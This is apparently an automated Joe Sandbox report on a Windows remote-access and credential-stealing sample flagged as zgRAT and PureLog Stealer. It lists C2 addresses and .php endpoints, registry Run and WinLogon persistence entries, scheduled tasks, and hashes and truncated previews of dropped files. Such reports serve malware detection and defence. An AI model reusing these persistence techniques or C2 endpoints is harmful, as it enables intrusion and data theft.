http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000018.00000002.1935191683.0000018C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18FAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	X54FKLunGc.48.dr	false	high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000032.00000003.1974959177.000001330ECA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1974959177.000001330ECF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1974959177.000001330ECE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	X54FKLunGc.48.dr	false	high
https://www.ecosia.org/newtab/	X54FKLunGc.48.dr	false	high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	j11z8HEtiF.48.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	X54FKLunGc.48.dr	false	high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000032.00000003.1974959177.000001330ED1A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	false	high
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	false	high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	X54FKLunGc.48.dr	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000018.00000002.1935191683.0000018C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18FAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.3222117287.0000018C10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000018.00000002.1935191683.0000018C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18F8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39C81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.mozilla.org	j11z8HEtiF.48.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	4Awb1u1GcJ.exe, 00000000.00000002.1813149962.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1935191683.0000018C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18F8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39C81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	X54FKLunGc.48.dr	false	high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	143840cm.nyashteam.ru	France		49434	HARMONYHOSTING-ASFR	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562698
Start date and time:	2024-11-25 22:36:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	56
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4Awb1u1GcJ.exe renamed because original name is a hash value
Original Sample Name:	382EAEDC34BFC15B7E749FB8A0CFF600.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@49/77@1/2
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 4Awb1u1GcJ.exe, PID 1076 because it is empty
Execution Graph export aborted for target 4Awb1u1GcJ.exe, PID 5024 because it is empty
Execution Graph export aborted for target dllhost.exe, PID 4336 because it is empty
Execution Graph export aborted for target dllhost.exe, PID 6732 because it is empty
Execution Graph export aborted for target dllhost.exe, PID 7580 because it is empty
Execution Graph export aborted for target hxpWOXgnBGVLArPcwqxpuA.exe, PID 7036 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 4Awb1u1GcJ.exe

Simulations

Behavior and APIs

Time	Type	Description
16:37:10	API Interceptor	149x Sleep call for process: powershell.exe modified
16:37:25	API Interceptor	1638386x Sleep call for process: hxpWOXgnBGVLArPcwqxpuA.exe modified
16:37:26	API Interceptor	2x Sleep call for process: svchost.exe modified
21:37:06	Task Scheduler	Run new task: hxpWOXgnBGVLArPcwqxpuA path: "C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe"
21:37:07	Task Scheduler	Run new task: hxpWOXgnBGVLArPcwqxpuAh path: "C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe"
21:37:09	Task Scheduler	Run new task: 4Awb1u1GcJ path: "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
21:37:09	Task Scheduler	Run new task: 4Awb1u1GcJ4 path: "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
21:37:09	Task Scheduler	Run new task: dllhost path: "C:\Users\user\NetHood\dllhost.exe"
21:37:10	Task Scheduler	Run new task: dllhostd path: "C:\Users\user\NetHood\dllhost.exe"
21:37:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
21:37:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\user\NetHood\dllhost.exe"
21:37:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
21:37:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
21:37:46	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\user\NetHood\dllhost.exe"
21:37:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
21:38:02	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run hxpWOXgnBGVLArPcwqxpuA "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
21:38:11	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\user\NetHood\dllhost.exe"
21:38:20	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4Awb1u1GcJ "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
21:38:37	Autostart	Run: WinLogon Shell "C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe"
21:38:46	Autostart	Run: WinLogon Shell "C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe"
21:38:56	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
21:39:04	Autostart	Run: WinLogon Shell "C:\Users\user\NetHood\dllhost.exe"
21:39:13	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\4Awb1u1GcJ.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.250	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
	QMT2731i8k.exe	Get hash	malicious	DCRat	Browse	117813cm.n9shteam.in/ExternalRequest.php
	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	452132cm.n9shteam2.top/Processdownloads.php
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	rollsroys.top/externaljsapisql.php
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	merlion.top/PythongameTrafficDatalifepublic.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	http://clavity.me	Get hash	malicious	Unknown	Browse	185.157.247.125
	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	QMT2731i8k.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\IETDQDzo.log	rbCoIEGfDf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	LWv5DuboZh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	rvNK8fDa0k.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	RustChecker.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	KPFv8ATDx0.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	LzmJLVB41K.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	T0jSGXdxX5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	main.exe	Get hash	malicious	DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse
	file_1443.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files\Windows Mail\33ddca35e40cf7

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with very long lines (615), with no line terminators
Category:	dropped
Size (bytes):	615
Entropy (8bit):	5.890701756337957
Encrypted:	false
SSDEEP:	12:XlFv8fDUiPk827bJQlx8zO6jdm9aZD7BJwEy7biAxd3zc41:AfQi8DptOUc03C7bVpzc6
MD5:	948146DC5544F90016022510CD9D160A
SHA1:	94626B29659D4463DA8502AA747D602486904551
SHA-256:	FDD600FE02E11B3F7A73D0DB75EBA84657817B3D5FA1738F159054B4E1DC555E
SHA-512:	DED266640FA8C693695E1FB39F819E3DFB7DA9A20AD13A267CFB9F2A810BE9CA55CB17B41347E5A626F363BD97C98787FC259CEF42BE875A3ABCFF1C914829E3
Malicious:	false
Preview:	X4wG2X6qmKNV1incdDxGZatpUtQLWbLQWgh86xciDj3CdXIRpGnsxkM6LHwIHvUL879UBpfqlPC0hqL7l9gPxdcwUlwzBUbSOrDgYxP9k6HihWYe6zgHOEXfeNAa2qpQxulznoixtgo1W4O8MS2LxTDJUiCKxzH4Q0vwui1RQtYsZfIk8CNjxdddrbfFmYA3YukfIbNnbl5E5UuyZbMulhGxXRFSDvp2seTp5nbhykIMiZiWrqqLLPS0nxI1W4kp5DVaBE3v9o5BZ4O8sslWFdqcMcCHfkK39cQeDIVnx4LhTRbtiJInTOkbW2NiCvQZeBB6nu4kW7iKSJJ5BTjVbhku1yHL4xlCovDSPfFyOiQWpaJNtShtM486bREymtpjWgfgG1qgNuG2QOFbp4cmP20txG08aQMf3r9J4mH2mBfbxFqNLnJrRDUeqwtAArF6il9jO6gCwj9OWY5rZmwxHeO0WfcI3H145i2MGH9PGG5rDFHR0BkY5SzEWJMtdYJpsFSxgtkRngrAjhwRXKR1gd8ntyz75Qwr7P88wTvHaSuZkyezW4VSHRIPGpEr3nWXu9DTixeDZKbNsjC5TAkA4dkqGt2HPDNx6XplvLR

C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.536430435787372
Encrypted:	false
SSDEEP:	24576:nfNh6iTrBgSq+kdkpupwocpF4jGdWWfWanontd7ksYKtAwqgKchGGqGLk6kIv/D5:f3/kGAwaCYO4ngs7wg8UkcX
MD5:	382EAEDC34BFC15B7E749FB8A0CFF600
SHA1:	D8729997725A187120EE95E1D6068586A13AB678
SHA-256:	E864306092DF6D14C7214C505630F0DF5FAAA0F622331EEC1DC9D3841DE2847A
SHA-512:	F2BE10566728F10A1396ABF3115A01D98A5B06D18B94E84ECB6FBB012F1AD3AD588BE84F09CEAFA55BC9FD65A7E6763C68CA67596141C750AE54A2BEBFC5C16B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................8...........V... ...`....@.. ....................................@..................................U..K....`.. ............................................................................ ............... ..H............text...$6... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................V......H...........$..............du..AU.......................................0..........(.... ........8........E....).......M...q...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8z...*...0..'....... ........8........E........................F.......8........~....(9...~....(=... ....<.... ....~....{x...9....& ....8....~....(1... .... .... ....s....~....(5....... ....~....{....9Y...& ....8N...~....9=... ....8:...8I... ..

C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x6c9beef7, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221472815296092
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5:	1C81841A422A88B2762F8D221B83B6DC
SHA1:	EC71B432B8CDB9F1EFB51F4E06A38EEB980526AD
SHA-256:	2DCC284A1F5DCABCD37C3F2F39A641362BD8F3BB085F871C8F714E1B8280EA7C
SHA-512:	EF9F648E8C94EB309D90BEFBDB54B53126BEEEB63AA87AAC24A4B71E824615ED42064280C71777D3FAAF642A1AE203C234A2A8322271B3B88B9AF2FC4244F9F0
Malicious:	false
Preview:	l...... .......A.......X\...;...{......................0.!..........{A..%...\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.......................................%...\|..................)s.V.%...\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\33ddca35e40cf7

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with very long lines (923), with no line terminators
Category:	dropped
Size (bytes):	923
Entropy (8bit):	5.910947624637857
Encrypted:	false
SSDEEP:	24:Ov6Ul8GsAXIRXvaa1ikgTM5GWrxNWUTs+ecLft32dM49zFoyR:Ov4KqvV1ZH5X/WUTsnEfX4ZR
MD5:	5DC135C17126663A4563F82E62B3D57C
SHA1:	D188A173AFEDC5747F14FD0EE012B020514DE986
SHA-256:	172DCEEE833120203B96F843BAD196E4D6527A66E383D9E6ED95958614C646E0
SHA-512:	3F5F3B4F0A128173DF321C4575FB345B39DA9ADBB9E8ED7B3FDEE494A31835C425EB63A04C331AC77469AC4975D3E9E64184C9F9420B8987A6AD8F08B809E26F
Malicious:	false
Preview:	XKPIMQShHtSBImhea3vtYIwVqcytt3lTHAGOeX21Amb9jkqOpwpqLdgOX4ctcjxNI84HfSADB3tvqwvFwkE7O5Hod21j5IZbyO1kqisWvmpSuvhkJW72e09N1PnnbaI2eS6c4KZN1rLlPz4sUQaiLh68Pota4F5VewxbyFp86uAxoX7CV5TKAjr7V8NQb8Svv0HdCc3OlblbgIT2rqF9wvV5EzG01Zh8bOBxPdA3BEji7QbNoViu3S9AfMZMWDXL3n9RHgmOqM7sMw7yY3Mg0xEIPBSCDxg8qXoTQJFIsUDrVQxsPkyd10UFj0BFNjK2p8ByHnhOxDxguWx9Njxc9DH0CjuaIA4JJKBWO9klDkqxCyVMDC2nvr3m1Lwi3HFxIoWjUauO9MZYXUxONhWFHRXcRZfDNCr5e3oYbw1mSoojReOhYhVWuAp1R4S55qB6fd4epZxapuxdmyKwL7ppqVLeNxGge6qlnrEyku18u4qAMMOduft8BVQJSZQ2SQ6tDL05tWMaFq4vpKRBinv8MskRb4fKe9qe867AWTtYTT2UbeeIHOToe8gUliez0B6GAaxsNQpP4Xo30P07aXCPpB9AamZxy3hSXvUAqv40jEuHTneVshYd8qa8axSl12aAzWfE4zQocMqlQ2qwHDFRfETrVWk2dT9qnuS6Hab3QtBw9zriGfdxxIfvDytiPXLIM97gkuormLBvChrfoBw70M3ePg3Tq2n3h2j91L8W0vKlHtsfGN3NlOSAGcQD1VBthINK7sndCZGEBSXfyXMd8ZRTjj3Y45ffuaD9ghiYjaLLIO8xFvOdIhvH04kXyPiH4kTkPY9Qzy3iOGKVkFTJqBWMp5Im7KjU2EQh4Xiqv7oUoM3utPwt5Za3NG5TQWToOiqKznaNgnXsXCicCY3sY0ZcnXT

C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.536430435787372
Encrypted:	false
SSDEEP:	24576:nfNh6iTrBgSq+kdkpupwocpF4jGdWWfWanontd7ksYKtAwqgKchGGqGLk6kIv/D5:f3/kGAwaCYO4ngs7wg8UkcX
MD5:	382EAEDC34BFC15B7E749FB8A0CFF600
SHA1:	D8729997725A187120EE95E1D6068586A13AB678
SHA-256:	E864306092DF6D14C7214C505630F0DF5FAAA0F622331EEC1DC9D3841DE2847A
SHA-512:	F2BE10566728F10A1396ABF3115A01D98A5B06D18B94E84ECB6FBB012F1AD3AD588BE84F09CEAFA55BC9FD65A7E6763C68CA67596141C750AE54A2BEBFC5C16B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................8...........V... ...`....@.. ....................................@..................................U..K....`.. ............................................................................ ............... ..H............text...$6... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................V......H...........$..............du..AU.......................................0..........(.... ........8........E....).......M...q...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8z...*...0..'....... ........8........E........................F.......8........~....(9...~....(=... ....<.... ....~....{x...9....& ....8....~....(1... .... .... ....s....~....(5....... ....~....{....9Y...& ....8N...~....9=... ....8:...8I... ..

C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\33ddca35e40cf7

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with very long lines (807), with no line terminators
Category:	dropped
Size (bytes):	807
Entropy (8bit):	5.900879061987369
Encrypted:	false
SSDEEP:	24:ecTJYOimF8j2XjmKCBR/O6TRXyQHpre7lJK:vOa8jki/Z8QJa7lE
MD5:	C76F517F28A18DD39FE4D8457CD91203
SHA1:	042A4FE0EC6DFEB8B6C2561A65401FA977D2576B
SHA-256:	3B25134B8D61B426C8125F885DB8FFFE4C6B34D24C7F3445E50ED4E274EE12A0
SHA-512:	613531F3E710910C7727AD1EEF4B99C98A005549F7D9A008AF79FD34F2F3F37B73A6730B700303FBCB4ACB8712519D21A54DC6AEB0472F4064F58A574905378E
Malicious:	false
Preview:	TJI0M9ZD5ZLlAHA2ehhnXat4ek9veNuIVmX1HJCItbtpRAUpTkQzrEa3ZNWmAniroCPYtJuVfY45qEneQUc475bRLec4xaIF3BBPv65K05USKfMVj1VpLoutl8MPqzhEQyCpCYsUZSECkIHqSHU5Ec4OQSnxtqdAXQBVchSLJBQ3ksIc0f6jfm9y4xYuu5ktyDpUHvNvyJwDMAoiJL6Nt3fuQNaoJhbNagEgDyVFSLvV06m3Jzli9W95i4D4UjlQrimp6HfV005hIJ3UkheT62NDhJ7IuausjeoRT76BUQsIbcwZAtTxESUzUjIxKWkZGM8oflBnkd8qJFmFWiIBH7oRJy7tzJ18pTCOdH3YrqMlTnqP6CalNjRJiqfqoRyblAB0CYlPotTbuD7fIrxwsQuFB3qxmMta1v9TmzMibL7eQ0Yet9i7eBtVP5zJsymb92j8Do3SfPUgTQzKeLDnow6zCoDr9C0njfeXRaaFFPcPrMC9Fppgu9xM6t6ZkLScZq7xvc3Eu8hYUrI0mElUXT3jsRahdBe469zAOOOnvkvvbY2PlGwgj8FFxXFdBWktenbV1HlYz8jwiHITZK5XO7U84uN1IulZACRy7hYdfYqkYShqPwE0aNegScaG4tPFXJwf0TV2wc20RtjlNhmWqu9xivfeGSjvJlNPgBz5aLE7UoOj3y3XH3YmK97Ex1ve2HqqfUFLrq5eqBc4g6lRZMoQMkFhDuHjZjFN7iDitrpa746IgDi1PdFqdae5PiH6iVEG6P683CirgNSSo6AAMQU6eYugEITKjt2mz0M

